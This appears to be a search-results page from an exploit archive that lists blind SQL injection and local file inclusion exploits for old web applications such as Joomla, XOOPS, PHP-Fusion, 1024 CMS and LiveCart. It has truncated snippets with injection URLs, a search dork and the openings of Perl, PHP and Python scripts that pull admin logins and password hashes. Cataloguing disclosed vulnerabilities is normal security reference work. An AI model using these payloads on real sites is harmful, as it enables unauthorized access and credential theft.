4668 matches found
joomlaprofiler-sql.txt
Joomla Component Profiler Blind SQL Injection Vulnerability found by: $hur!k'n Contact: [email protected] ScriptName: "Joomla" ModuleName: "Profiler" Version: ? DORK: allinurl:comcomprofiler Exploit: /index.php?option=comcomprofiler&task=userProfile&user=SQL Example:...
webcal-sql.txt
!/usr/bin/perl use strict; use LWP::Simple; print "-+-- Web Calendar ; print "\n\nInjecting Please Wait..\n\n" my $lop = 1; my $num = 48; my $sub = 1; my $res = undef; my $content = undef; while$lop $content = get$url."/oneday.php?userid=1 AND ASCIISUBSTRINGSELECT CONCATlogin,char58,password,char...
Web Calendar 4.1 - Blind SQL Injection
!/usr/bin/perl use strict; use LWP::Simple; print "-+-- Web Calendar ; print "\n\nInjecting Please Wait..\n\n" my $lop = 1; my $num = 48; my $sub = 1; my $res = undef; my $content = undef; while$lop $content = get$url."/oneday.php?userid=1 AND ASCIISUBSTRINGSELECT CONCATlogin,char58,password,char...
Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it
/Cr@zyKing / http://coderx.org Xoops All Version -Articles- Article.PHP ID Blind SQL Injection ExpL0it Sql 1-2 article.php?id=3+union+select+1,2,3,4,5,6,AESDECRYPTAESENCRYPTUSER,0x71,0x71,8,9,0,1,2,3,4,5,6,7,8,9,0/...
XOOPS 2.0.14 Article Module - article.php SQL Injection
XOOPS 2.0.14 Article Module - article.php SQL Injection source: https://www.securityfocus.com/bid/28879/info XOOPS Article module is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could...
xoopsall-sql.txt
/Cr@zyKing / http://coderx.org Xoops All Version -Articles- Article.PHP ID Blind SQL Injection ExpL0it Sql 1-2 article.php?id=3+union+select+1,2,3,4,5,6,AESDECRYPTAESENCRYPTUSER,0x71,0x71,8,9,0,1,2,3,4,5,6,7,8,9,0/...
PHP-Fusion 6.00.307 Remote Blind SQL Injection Exploit
No description provided by source. !/usr/bin/python """ ================================================================================================= / | |\ \ / | / |/ | | |/ \ | | / \ \ | \ \ &nbs...
PHP-Fusion 6.01.14 - Blind SQL Injection
!/usr/bin/python """ ================================================================================================= / | |\ \ / | / |/ | | |/ \ | | | |||| /| / / ================================================================================================= This was a priv8 Exploit...
PHP-Fusion 6.01.14 - Blind SQL Injection
PHP-Fusion 6.01.14 - Blind SQL Injection !/usr/bin/python """ ================================================================================================= / | |\ \ / | / |/ | | |/ \ | | | |||| /| / /...
PHP-Fusion <= 6.01.14 Remote Blind SQL Injection Exploit
No description provided by source. !/usr/bin/python """ ================================================================================================= / | |\ \ / | / |/ | | |/ \ | | / \ \ | \ \ | | | \ | |/ \ | | // | || | ||| /| / /\ | |||| /| / /...
S21SEC-043-en:Cezanne SW Blind SQL Injection
S21Sec Advisory - Title: Cezanne SW login required Blind SQL Injection ID: S21SEC-043-en Severity: High History: 02.Jan.2008 Vulnerability discovered Authors: Juan de la Fuente Costa [email protected] Fco Javier Puerta Rubio [email protected] URL: http://www.s21sec.com/avisos/s21sec-43-en.txt...
1024cms-lfisql.txt
Author: GiReX mySite: girex.altervista.org Date: 13/04/2008 CMS: 1024 CMS = 1.4.1 and 1.4.2 beta Site: 1024cms.com Bug1: Local File Inclusion Need: magicquotesgpc = Off / registerglobals = On Bug2: Cookie Blind SQL Injection Exploit: Admin Hash Retrieve Exploit Need: magicquotesgpc = Off Bug1: Vu...
mumbojumbo-sql.txt
php '.$argv0.' http://www.site.com/cms/ 300 1 '; if $argc 1 printr' '; echo 'Searching for Admin: '; for$i=1; $i = 50; $i++ $temp1 = filegetcontents$argv1.'index.php?id='.$argv2.'+and+lengthselect+kennung+from+op4admin+where+id='.$argv3.'='.$i.'--'; if strpos$temp1,'Die angeforderte Seite existie...
1024 CMS <= 1.4.2 Local File Inclusion / Blind SQL Injection Exploit
Exploit for unknown platform in category web applications ==================================================================== 1024 CMS = 1.4.2 Local File Inclusion / Blind SQL Injection Exploit ==================================================================== Author: GiReX Date: 13/04/2008 CM...
1024 CMS 1.4.2 - Local File Inclusion / Blind SQL Injection
Author: GiReX mySite: girex.altervista.org Date: 13/04/2008 CMS: 1024 CMS = 1.4.1 and 1.4.2 beta Site: 1024cms.com Bug1: Local File Inclusion Need: magicquotesgpc = Off / registerglobals = On Bug2: Cookie Blind SQL Injection Exploit: Admin Hash Retrieve Exploit Need: magicquotesgpc = Off Bug1: Vu...
1024 CMS <= 1.4.2 Local File Inclusion / Blind SQL Injection Exploit
No description provided by source. Author: GiReX mySite: girex.altervista.org Date: 13/04/2008 CMS: 1024 CMS = 1.4.1 and 1.4.2 beta Site: 1024cms.com Bug1: Local File Inclusion Need: magicquotesgpc = Off / registerglobals = On Bug2: Cookie Blind SQL Injection Exploit: Admin Hash Retrieve Exploit...
Mumbo Jumbo Media OP4 - Blind SQL Injection
Mumbo Jumbo Media OP4 - Blind SQL Injection php '.$argv0.' http://www.site.com/cms/ 300 1 '; if $argc 1 printr' '; echo 'Searching for Admin: '; for$i=1; $i = 50; $i++ $temp1 = filegetcontents$argv1.'index.php?id='.$argv2.'+and+lengthselect+kennung+from+op4admin+where+id='.$argv3.'='.$i.'--'; if...
1024 CMS 1.4.2 - Local File Inclusion Blind SQL Injection
1024 CMS 1.4.2 - Local File Inclusion Blind SQL Injection Author: GiReX mySite: girex.altervista.org Date: 13/04/2008 CMS: 1024 CMS = 1.4.1 and 1.4.2 beta Site: 1024cms.com Bug1: Local File Inclusion Need: magicquotesgpc = Off / registerglobals = On Bug2: Cookie Blind SQL Injection Exploit: Admin...
livecart-blindsql.txt
!/usr/bin/perl -w use LWP::UserAgent; ----------------------------------------------------------------------------------------------- scripts : livecart Remote Blind Sql Injection scripts site : http://www.livecart.com Discovered By : irvian site : http://irvian.cn forum : http://noscan.info/foru...
LiveCart 1.1.1 - 'id' Blind SQL Injection
!/usr/bin/perl -w use LWP::UserAgent; ----------------------------------------------------------------------------------------------- scripts : livecart Remote Blind Sql Injection scripts site : http://www.livecart.com Discovered By : irvian site : http://irvian.cn forum : http://noscan.info/foru...